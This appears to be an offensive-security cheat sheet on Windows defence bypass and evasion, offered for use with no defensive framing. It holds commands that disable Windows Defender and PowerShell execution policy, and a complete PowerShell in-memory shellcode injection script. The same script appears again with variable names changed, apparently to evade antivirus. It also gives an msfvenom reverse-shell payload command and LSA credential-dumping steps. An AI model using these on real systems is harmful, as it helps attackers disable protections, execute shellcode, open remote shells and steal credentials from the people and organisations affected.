Bypass and Evasion

Bypass

# Bypass the execution policy in PS
powershell -ep bypass

# Powershell command using to disable real time monitoring in Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true

# Disable Powershell ExecutionPolicy
Set-ExecutionPolicy Unrestricted
Get-ExecutionPolicy
Set-ExecutionPolicy -Scope CurrentUser  => Unrestricted
# Verifying if Credential Guard is enabled : DeviceGuardSecurityServicesConfigured, DeviceGuardSecurityServicesRunning
Get-ComputerInfo

# Changing the ExecutionPolicy for our current user
Get-ExecutionPolicy -Scope CurrentUser
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

# In-memory payload injection script for PowerShell
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = 
  Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]];
[Byte[]]$sc = <place your shellcode here>;

$size = 0x1000;

if ($sc.Length -gt 0x1000) {$size = $sc.Length};

$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

# msfvenom PowerShell (x86) payload 
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=443 -f powershell -v sc

# Renaming variables for In-memory Injection
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$var295 = Add-Type -memberDefinition $code -Name "iWin32" -namespace Win32Functions -passthru;

[Byte[]];
[Byte[]] $var195 = <place your shellcode here>;

$size = 0x1000;

if ($var195.Length -gt 0x1000) {$size = $var195.Length};

$x = $var295::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($var195.Length-1);$i++) {$var295::memset([IntPtr]($x.ToInt32()+$i), $var195[$i], 1)};

$var295::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

# Shellter is a dynamic shellcode injection tool
sudo shellter

# Reflectively load a DLL/EXE in to PowerShell process
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1

LSA Dump

Invoke-Ninilib.obf.ps1
pypykatz lsa minidump System.cache.dmp